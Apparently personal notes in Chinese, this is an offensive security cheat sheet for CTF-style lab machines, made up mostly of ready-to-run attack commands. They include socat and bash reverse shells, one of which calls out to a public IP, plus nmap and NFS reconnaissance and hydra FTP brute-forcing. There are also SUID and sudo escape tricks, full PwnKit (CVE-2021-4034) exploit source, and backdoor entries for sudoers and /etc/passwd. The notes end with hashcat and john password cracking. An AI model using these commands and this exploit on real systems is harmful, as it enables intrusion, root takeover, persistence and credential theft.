优化shell
1
| python -c 'import pty; pty.spawn("/bin/bash")'
|
1 2 3 4 5
| socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.56.1:4444
|
信息搜集
进程
监听端口
smb
1
| sudo nxc smb rebound.htb --shares
|
nmap
1 2 3
| nmap 192.168.56.3 -p-
nmap 192.168.56.3 -p 22,80,2222 -sC -sV
|
nmap的扫描结果显示存在时间偏差,通常在红队进行攻击时,如果存在时间偏差,会导致利用kerberos票据或者ntlm的身份验证等依赖时间戳时,出现验证失败
所以看到这种情况,需要做时间同步
1 2 3
| sudo ntpdate 10.129.232.31
sudo net time set -S 10.129.232.31
|
sudo权限命令查看
历史命令
nfs共享目录
共享文件系统
查看共享了那些目录
1
| showmount -e 192.168.57.3
|
mount挂载
1
| mount -t nfs 192.168.57.3:/ /mnt/metasploitable2/
|
环境变量注入
LD_PRELOAD
编译
1
| gcc -fPIC -shared -nostartfiles -o evil.so evil.c
|
端口利用
ftp 22
登录
anonymous
爆破密码
1
| hydra -L user.txt -P pass.txt ftp://192.168.56.3
|
命令
1 2 3 4 5 6 7
| pwd
ls
get
put ~/.ssh/id_rsa_maze.pub authorized_keys
|
mqtt 1883
‘#’代表订阅所有主题
1
| mosquitto_sub -h 192.168.56.3 -t "#" -v
|
SUID利用
查找命令
1 2 3
| find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ;
|
bash
直接进入root交互
find
指定一个文件然后执行任意命令
1 2 3
| find /etc/passwd -exec whoami \;
find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/101.37.210.236/2333 0>&1' \;
|
nmap
早期nmap版本带有交互模式,因而允许用户执行shell命令,适用版本:nmap2.02至5.21
vim
如果以SUID运行,可以读取硬盘所有文件
执行命令
把命令执行结果粘贴在光标所在行
cp
覆盖系统文件,如果有suid权限可以查看其他用户文件
1 2
| sudo -l sudo -u arete /bin/cp /pwned/arete/flagz.txt /dev/stdout
|
nano
less、more
先指定文件查看,然后执行命令
1 2 3
| less /etc/passwd
:!ls -la
|
awk
1 2 3 4 5
| awk '{system("ls")}' 需要再换行才能执行命令结果
awk 'BEGIN {system("/bin/bash")}' 直接输出命令结果
|
pkexec
尝试CVE-2021-4034
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
|
char *shell = "#include <stdio.h>\n" "#include <stdlib.h>\n" "#include <unistd.h>\n\n" "void gconv() {}\n" "void gconv_init() {\n" " setuid(0); setgid(0);\n" " seteuid(0); setegid(0);\n" " system(\"export " "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/" "bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n" " exit(0);\n" "}";
int main(int argc, char *argv[]) { FILE *fp; system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x " "'GCONV_PATH=./pwnkit'"); system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > " "pwnkit/gconv-modules"); fp = fopen("pwnkit/pwnkit.c", "w"); fprintf(fp, "%s", shell); fclose(fp); system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"); char *env[] = {"pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL}; execve("/usr/bin/pkexec", (char *[]){NULL}, env); }
|
提权
sudoers.d
用于配置sudo权限的文件夹,写入以下则player用户用sudo不用输入密码
但是由于sudoers.d文件夹下的文件所有者必须是root,所以此文件夹下的文件权限必须是0440或0640
1 2
| echo 'player ALL=(ALL:ALL) NOPASSWD: ALL' > /etc/sudoers.d/player chmod 0440 /etc/sudoers.d/player
|
/etc/passwd
1
| hack:x:0:0::/root:/usr/bin/bash
|
隧道
ssh
前提需要知道ssh密码,本机执行后127.0.0.1:8888访问
1
| ssh -L 8888:127.0.0.1:8080 gaoyan8764@192.168.56.3
|
socat
把 8080 端口的流量转发到 127.0.0.1:5000
1
| socat TCP-LISTEN:8080,fork TCP:127.0.0.1:5000
|
爆破哈希
hashcat
1.看源码哈希加密来源
1 2 3
| md5() 就是 0 md5(md5()) 就是 2600 md5(md5(md5())) 就是 3500
|
2.识别hash类型,会列出多个候选
1 2 3
| hashcat --identify 7022cd14c42ff272619d6beacdc9ffde
输出有#、Name、Category三个字段,#是hash mode编号,Name为哈希算法名,Category模式所属大类
|
3.试hash mode,先跑字典攻击
1 2 3
| echo '7022cd14c42ff272619d6beacdc9ffde' > hash.txt
hashcat -m 0 -a 0 hash.txt rockyou.txt
|
4.掩码爆破
1 2 3 4 5 6 7 8 9 10 11
| ?l:小写字母 a-z ?u:大写字母 A-Z ?d:数字 0-9 ?s:特殊字符 ?a:?l?u?d?s 的组合 ?b:所有 0x00-0xff 字节
?h:小写十六进制 0-9a-f ?H:大写十六进制 0-9A-F
|
1 2 3 4 5
| 8位数字爆破 hashcat -m 0 -a 3 hash.txt ?d?d?d?d?d?d?d?d
1至8位的密码都试y hashcat -a 3 -m 0 hash.txt --increment --increment-min=1 --increment-max=8 ?a?a?a?a?a?a?a?a
|
查看
1
| hashcat --show -m 0 hash.txt
|
类型
md5
1
| hashcat -m 0 -a 3 hash.txt ?d?d?d?d?d?d?d?d
|
md5($pass + $salt)
1 2 3 4
| 结构:hashcat -m 10 '$pass:$' -a 3 --increment --increment-min=1 --increment-max=8 '?a?a?a?a?a?a?a?a'
例如: hashcat -m 10 'd29d8d165f1110bca380a3b1ce020b29:40dfb7391c19a66939e6b6f4e9898804' -a 3 --increment --increment-min=1 --increment-max=8 '?a?a?a?a?a?a?a?a'
|
SSH passphrase
获取私钥
转换hash
1
| python2 /usr/bin/ssh2john id_rsa > ssh_hash.txt
|
爆破
1
| john --format=SSH --wordlist=files/dictionary/rockyou.txt ssh_hash.txt
|